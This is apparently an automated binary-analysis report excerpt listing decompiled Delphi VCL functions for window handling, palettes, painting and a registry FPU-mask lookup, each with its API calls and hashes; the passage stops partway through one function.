                                            • Instruction ID: bcd121cd6ae07d518ea38b8544f883969e9e13dd871a87a8f13bb7e95d4cfe24
                                            • Opcode Fuzzy Hash: 019b83b4e9188ae3dc6cd8f35ae1ca310736e6178f5e9aa50ed0a502c72fdab1
                                            • Instruction Fuzzy Hash: 681101F165C3006FEB24AB6CDD41F2537D8E7D5388F414092F004C76A5E625BC80AB22
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096C448, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0096C448(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x99a9f0; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x99a9f0; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x99a9f0; // 0x0
				SetPropA(_a4,  *0x99cb26 & 0x0000ffff, _t27);
				_t31 =  *0x99a9f0; // 0x0
				SetPropA(_a4,  *0x99cb24 & 0x0000ffff, _t31);
				_t35 =  *0x99a9f0; // 0x0
				 *0x99a9f0 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                            0x0096c44d
                                            0x0096c450
                                            0x0096c458
                                            0x0096c45e
                                            0x0096c470
                                            0x0096c485
                                            0x0096c4a0
                                            0x0096c4a0
                                            0x0096c4a5
                                            0x0096c4b7
                                            0x0096c4bc
                                            0x0096c4ce
                                            0x0096c4df
                                            0x0096c4e4
                                            0x0096c4f4
                                            0x0096c4fc

                                            APIs
                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 0096C470
                                            • GetWindowLongA.USER32 ref: 0096C47B
                                            • GetWindowLongA.USER32 ref: 0096C48D
                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 0096C4A0
                                            • SetPropA.USER32(?,00000000,00000000), ref: 0096C4B7
                                            • SetPropA.USER32(?,00000000,00000000), ref: 0096C4CE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: LongWindow$Prop
                                            • String ID:
                                            • API String ID: 3887896539-0
                                            • Opcode ID: 1cad35fcdba8403652928f273879a6070cdfef39d7673feb0e371ae65b2a835a
                                            • Instruction ID: 3ff0c53b82276a00edd31b61bc24b2bc3d6cf482ca16956b9d8cd98e00b75113
                                            • Opcode Fuzzy Hash: 1cad35fcdba8403652928f273879a6070cdfef39d7673feb0e371ae65b2a835a
                                            • Instruction Fuzzy Hash: 211194F6514609BFDB00DF9CDC85EAA3BACFB49360F108212B914DB2A1D735E940DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00960F98, Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00960F98(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E009428F8(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00960F00(_t34) == 0) {
						E00960D90( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}













                                            0x00960fa1
                                            0x00960fa3
                                            0x00960fa5
                                            0x00960fad
                                            0x00960fe7
                                            0x00960ff5
                                            0x00960faf
                                            0x00960fb6
                                            0x00960fba
                                            0x00960fd3
                                            0x00960fda
                                            0x00960fe0
                                            0x00960fe0
                                            0x00961000
                                            0x00961008
                                            0x0096101e
                                            0x0096101e
                                            0x0096102b
                                            0x0096102b
                                            0x00961038

                                            APIs
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00960FB1
                                            • SelectObject.GDI32(00000000,00000000), ref: 00960FBA
                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00963487,?,?,?,?,00962073), ref: 00960FCE
                                            • SelectObject.GDI32(00000000,00000000), ref: 00960FDA
                                            • DeleteDC.GDI32(00000000), ref: 00960FE0
                                            • CreatePalette.GDI32 ref: 00961026
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                            • String ID:
                                            • API String ID: 2515223848-0
                                            • Opcode ID: f3146732184e0ccb73ada7bf43b60d121d81bb7ecd5688902f1371047f25501d
                                            • Instruction ID: 98fc40624acaba12b8d30ee02f55265d9457f412e888582fc5c7e54d9cfde15b
                                            • Opcode Fuzzy Hash: f3146732184e0ccb73ada7bf43b60d121d81bb7ecd5688902f1371047f25501d
                                            • Instruction Fuzzy Hash: ED0175A160435076DB24A7699C43F6B72FC9FC1750F04C919B5858B292E679CC44D393
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00960688, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00960688(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0095FE64( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0095FE64( *((intOrPtr*)(_t36 + 0x14))));
				if(E0095FF44( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0095F1A4(E0095FE28( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0095F1A4(E0095FE28( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                            0x00960689
                                            0x00960694
                                            0x009606a6
                                            0x009606b5
                                            0x009606ef
                                            0x00960700
                                            0x009606b7
                                            0x009606c9
                                            0x009606da
                                            0x009606da

                                            APIs
                                              • Part of subcall function 0095FE64: CreateBrushIndirect.GDI32(?), ref: 0095FF0E
                                            • UnrealizeObject.GDI32(00000000), ref: 00960694
                                            • SelectObject.GDI32(?,00000000), ref: 009606A6
                                            • SetBkColor.GDI32(?,00000000), ref: 009606C9
                                            • SetBkMode.GDI32(?,00000002), ref: 009606D4
                                            • SetBkColor.GDI32(?,00000000), ref: 009606EF
                                            • SetBkMode.GDI32(?,00000001), ref: 009606FA
                                              • Part of subcall function 0095F1A4: GetSysColor.USER32(?), ref: 0095F1AE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                            • String ID:
                                            • API String ID: 3527656728-0
                                            • Opcode ID: ba38ea909431cff8a446aa822f4544e0c5d8b599acd49bd7b2f213b71488052f
                                            • Instruction ID: 9525e86d339698b0ca43cc87ef3939347a7cdd1f7d6325aba4cc76086387e651
                                            • Opcode Fuzzy Hash: ba38ea909431cff8a446aa822f4544e0c5d8b599acd49bd7b2f213b71488052f
                                            • Instruction Fuzzy Hash: A5F066F56042009BDE04FFA9EAD7F0B6798AF8531670444A0BD04DF16BCA25D8148732
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00942F9C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 65%
                                            			E00942F9C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x99a020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x99a020; // 0x27f
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x99a020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(0x94300d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x943014);
					return RegCloseKey(_v8);
				}
			}












                                            0x00942f9d
                                            0x00942f9f
                                            0x00942fa9
                                            0x00942fc5
                                            0x00943014
                                            0x00943026
                                            0x00943029
                                            0x00943032
                                            0x00942fc7
                                            0x00942fc9
                                            0x00942fca
                                            0x00942fcf
                                            0x00942fd2
                                            0x00942fd5
                                            0x00942ff1
                                            0x00942ff8
                                            0x00942ffb
                                            0x00942ffe
                                            0x0094300c
                                            0x0094300c

                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00942FBE
                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0094300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00942FF1
                                            • RegCloseKey.ADVAPI32(?,00943014,00000000,?,00000004,00000000,0094300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00943007
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                            • API String ID: 3677997916-4173385793
                                            • Opcode ID: ced13df1c76355ecc69ac060c6891140afefd9c487414dd6e5cfa992a4b9815b
                                            • Instruction ID: afcbe607e948551def9577d7bb667fd8866ce57d70d65bef12c809b2d1241a08
                                            • Opcode Fuzzy Hash: ced13df1c76355ecc69ac060c6891140afefd9c487414dd6e5cfa992a4b9815b
                                            • Instruction Fuzzy Hash: BC01D479A10308BADB11DFE4DC02FADB7BCEB49B04F1041A2FA10E7590E6B15A20D7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096CFC8, Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E0096CFC8(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				void* _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t113;
				struct HWND__* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;

				_t103 = __ecx;
				_t102 = __eax;
				_v5 = 1;
				_t114 = E0096D418(_a4 + 0xfffffff7);
				_v24 = _t114;
				_t53 = GetWindow(_t114, 4);
				_t105 =  *0x99b0ac; // 0x99cbb8
				_t4 =  *_t105 + 0x30; // 0x0
				if(_t53 ==  *_t4) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t115 = _t102;
					while(1) {
						_t55 =  *((intOrPtr*)(_t115 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t115 = _t55;
					}
					_t113 = E00975D08(_t115);
					_v28 = _t113;
					if(_t113 == _v24) {
						goto L25;
					}
					_t13 = _a4 - 0x10; // 0xe87d83e8
					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
					if(_t60 == 0) {
						_t19 = _a4 - 0x10; // 0xe87d83e8
						_t107 =  *0x96bb70; // 0x96bbbc
						__eflags = E009432B8( *_t19, _t107);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t21 = _a4 - 0x10; // 0xe87d83e8
							_v32 = E00975D08( *_t21);
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						EnumThreadWindows(GetCurrentThreadId(), E0096CF5C,  &_v32);
						_t127 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E00943328(_t102, _t127);
						_t79 =  *0x99cb38; // 0x0
						_t111 =  *0x96a950; // 0x96a99c
						if(E009432B8(_t79, _t111) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t85 =  *0x99cb38; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t87 =  *0x99cb38; // 0x0
						if(E00975D08( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t117 = _t60;
					while(1) {
						_t94 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t94 == 0) {
							break;
						}
						_t117 = _t94;
					}
					_v32 = E00975D08(_t117);
					goto L19;
				}
				_t118 = E0096C534(_v24, _t103);
				if(_t118 == 0) {
					goto L25;
				} else {
					while(1) {
						_t99 =  *((intOrPtr*)(_t118 + 0x30));
						if(_t99 == 0) {
							break;
						}
						_t118 = _t99;
					}
					_v24 = E00975D08(_t118);
					goto L6;
				}
			}































                                            0x0096cfc8
                                            0x0096cfd1
                                            0x0096cfd3
                                            0x0096cfe2
                                            0x0096cfe4
                                            0x0096cfea
                                            0x0096cfef
                                            0x0096cff7
                                            0x0096cffa
                                            0x0096d023
                                            0x0096d027
                                            0x0096d156
                                            0x0096d15f
                                            0x0096d15f
                                            0x0096d02d
                                            0x0096d033
                                            0x0096d033
                                            0x0096d038
                                            0x00000000
                                            0x00000000
                                            0x0096d031
                                            0x0096d031
                                            0x0096d041
                                            0x0096d043
                                            0x0096d049
                                            0x00000000
                                            0x00000000
                                            0x0096d052
                                            0x0096d055
                                            0x0096d05a
                                            0x0096d07b
                                            0x0096d07e
                                            0x0096d089
                                            0x0096d08b
                                            0x0096d09d
                                            0x0096d09f
                                            0x0096d08d
                                            0x0096d090
                                            0x0096d098
                                            0x0096d098
                                            0x0096d0a2
                                            0x0096d0a2
                                            0x0096d0a6
                                            0x0096d0ac
                                            0x0096d0b2
                                            0x0096d0c4
                                            0x0096d0c9
                                            0x0096d0cd
                                            0x00000000
                                            0x00000000
                                            0x0096d0db
                                            0x0096d0e6
                                            0x0096d0eb
                                            0x0096d0fb
                                            0x0096d100
                                            0x0096d105
                                            0x0096d112
                                            0x0096d13d
                                            0x0096d150
                                            0x0096d152
                                            0x0096d152
                                            0x00000000
                                            0x0096d150
                                            0x0096d114
                                            0x0096d123
                                            0x00000000
                                            0x00000000
                                            0x0096d125
                                            0x0096d13b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0096d13b
                                            0x0096d05f
                                            0x0096d065
                                            0x0096d065
                                            0x0096d06a
                                            0x00000000
                                            0x00000000
                                            0x0096d063
                                            0x0096d063
                                            0x0096d073
                                            0x00000000
                                            0x0096d073
                                            0x0096d004
                                            0x0096d008
                                            0x00000000
                                            0x0096d00e
                                            0x0096d012
                                            0x0096d012
                                            0x0096d017
                                            0x00000000
                                            0x00000000
                                            0x0096d010
                                            0x0096d010
                                            0x0096d020
                                            0x00000000
                                            0x0096d020

                                            APIs
                                              • Part of subcall function 0096D418: WindowFromPoint.USER32(0096D1F2,0099CB5C,00000000,0096CFE2,?,-0000000C,?), ref: 0096D41E
                                              • Part of subcall function 0096D418: GetParent.USER32(00000000), ref: 0096D435
                                            • GetWindow.USER32(00000000,00000004), ref: 0096CFEA
                                            • GetCurrentThreadId.KERNEL32 ref: 0096D0BE
                                            • EnumThreadWindows.USER32(00000000,0096CF5C,?), ref: 0096D0C4
                                            • GetWindowRect.USER32 ref: 0096D0DB
                                            • IntersectRect.USER32 ref: 0096D149
                                              • Part of subcall function 0096C534: GetWindowThreadProcessId.USER32(?), ref: 0096C541
                                              • Part of subcall function 0096C534: GetCurrentProcessId.KERNEL32(?,?,?,00000000,00000000,0096D004,?,-0000000C,?), ref: 0096C54A
                                              • Part of subcall function 0096C534: GlobalFindAtomA.KERNEL32(00000000), ref: 0096C55F
                                              • Part of subcall function 0096C534: GetPropA.USER32 ref: 0096C576
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
                                            • String ID:
                                            • API String ID: 2202917067-0
                                            • Opcode ID: 6e2822cc6736e8ef376f5eb73c8491ab4532f7231302e5830c3bf6085d478ec1
                                            • Instruction ID: 576d75174a772446a8fd5c81dbf3e4a7215108c626eac99f554f922a9c0ab690
                                            • Opcode Fuzzy Hash: 6e2822cc6736e8ef376f5eb73c8491ab4532f7231302e5830c3bf6085d478ec1
                                            • Instruction Fuzzy Hash: F95178B1B062099FCB10DF68C885BAEB7B8AF49350F158165E828EB351D775ED01CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009739BC, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E009739BC(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00975D08(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x973adc);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00956C88( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E00973B14(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x973ae3);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00975D08(_v8),  &_v84);
				}
				return _t55;
			}


















                                            0x009739bd
                                            0x009739bf
                                            0x009739c5
                                            0x009739c8
                                            0x009739ce
                                            0x009739d3
                                            0x009739e7
                                            0x009739e7
                                            0x009739eb
                                            0x009739ec
                                            0x009739f1
                                            0x009739f4
                                            0x00973a01
                                            0x00973a1b
                                            0x00973a1e
                                            0x00973a31
                                            0x00973a34
                                            0x00973a36
                                            0x00973a37
                                            0x00973a39
                                            0x00973a44
                                            0x00973a4d
                                            0x00973a5f
                                            0x00000000
                                            0x00973a61
                                            0x00973a7d
                                            0x00973a84
                                            0x00000000
                                            0x00000000
                                            0x00973a84
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00973a86
                                            0x00973a86
                                            0x00973a87
                                            0x00973a87
                                            0x00973a39
                                            0x00973a8a
                                            0x00973a8e
                                            0x00973a97
                                            0x00973a97
                                            0x00973aa2
                                            0x00973a03
                                            0x00973a0a
                                            0x00973a0a
                                            0x00973aae
                                            0x00973ab5
                                            0x00973ab8
                                            0x00973abb
                                            0x00973ac0
                                            0x00973ac7
                                            0x00000000
                                            0x00973ad6
                                            0x00973adb

                                            APIs
                                            • BeginPaint.USER32(00000000,?), ref: 009739E2
                                            • SaveDC.GDI32(?), ref: 00973A16
                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00973A78
                                            • RestoreDC.GDI32(?,?), ref: 00973AA2
                                            • EndPaint.USER32(00000000,?,00973AE3), ref: 00973AD6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                            • String ID:
                                            • API String ID: 3808407030-0
                                            • Opcode ID: 1892fb8cb9cb314c9de62d86e39de088a586fd9cb06d6881e6d039e1066a4dbe
                                            • Instruction ID: b85c04e7297a459a36d9730819006e26fb82121c4e0eed015ef185b47d4123b5
                                            • Opcode Fuzzy Hash: 1892fb8cb9cb314c9de62d86e39de088a586fd9cb06d6881e6d039e1066a4dbe
                                            • Instruction Fuzzy Hash: C0414CB1A00204AFDB14DB98C886FAEB7F9FF89704F15C0A8E5489B266D775DE44DB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009773D8, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E009773D8(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x99af54; // 0x99c900
					_t17 =  *0x99af54; // 0x99c900
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L009651A8();
					_v8 = _t19;
					_push(_t49);
					_push(0x977498);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x99b204; // 0x99cbbc
					E009651E0(_v8, E0098C9FC( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x99b204; // 0x99cbbc
					E009651E0(_v8, E0098C9FC( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0096522C();
					_push( &_v16);
					_push(0);
					L0096523C();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0096522C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x97749f);
					_t37 = _v8;
					_push(_t37);
					L009651B0();
					return _t37;
				}
			}

















                                            0x009773d9
                                            0x009773db
                                            0x009773df
                                            0x009773e6
                                            0x009774a3
                                            0x009773ec
                                            0x009773f4
                                            0x00977400
                                            0x00977407
                                            0x00977409
                                            0x0097740a
                                            0x0097740f
                                            0x00977414
                                            0x00977415
                                            0x0097741a
                                            0x0097741d
                                            0x00977424
                                            0x00977435
                                            0x0097743e
                                            0x0097744f
                                            0x00977454
                                            0x00977456
                                            0x00977458
                                            0x0097745d
                                            0x0097745e
                                            0x00977466
                                            0x00977467
                                            0x00977469
                                            0x00977471
                                            0x00977475
                                            0x00977476
                                            0x0097747b
                                            0x0097747c
                                            0x00977483
                                            0x00977486
                                            0x00977489
                                            0x0097748e
                                            0x00977491
                                            0x00977492
                                            0x00977497
                                            0x00977497

                                            APIs
                                            • 73641AB0.COMCTL32(00000000), ref: 0097740A
                                              • Part of subcall function 009651E0: 73642140.COMCTL32(0096D6EE,000000FF,00000000,0097743A,00000000,00977498,?,00000000), ref: 009651E4
                                            • 73641680.COMCTL32(0096D6EE,00000000,00000000,00000000,00000000,00977498,?,00000000), ref: 0097745E
                                            • 73641710.COMCTL32(00000000,?,0096D6EE,00000000,00000000,00000000,00000000,00977498,?,00000000), ref: 00977469
                                            • 73641680.COMCTL32(0096D6EE,00000001,?,00977501,00000000,?,0096D6EE,00000000,00000000,00000000,00000000,00977498,?,00000000), ref: 0097747C
                                            • 73641F60.COMCTL32(0096D6EE,0097749F,00977501,00000000,?,0096D6EE,00000000,00000000,00000000,00000000,00977498,?,00000000), ref: 00977492
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: 7364173641680$7364171073642140
                                            • String ID:
                                            • API String ID: 3959120851-0
                                            • Opcode ID: 3c51f68ad9658bedd44b2a1735fe6e3e5408e1219d47e9f043f3e2d4fa2e164d
                                            • Instruction ID: 0174750d0f56129c320c22d7fbcdd9a57013adc5253174dc8459f1e8ed98c110
                                            • Opcode Fuzzy Hash: 3c51f68ad9658bedd44b2a1735fe6e3e5408e1219d47e9f043f3e2d4fa2e164d
                                            • Instruction Fuzzy Hash: 89216D75708604BFDB10EBA8DC82F6D73F9EB89B00F514091F914EB2A1DA75AD40DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096343C, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0096343C(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E00961E9C(_t22);
					}
					_t21 = E00960F98( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
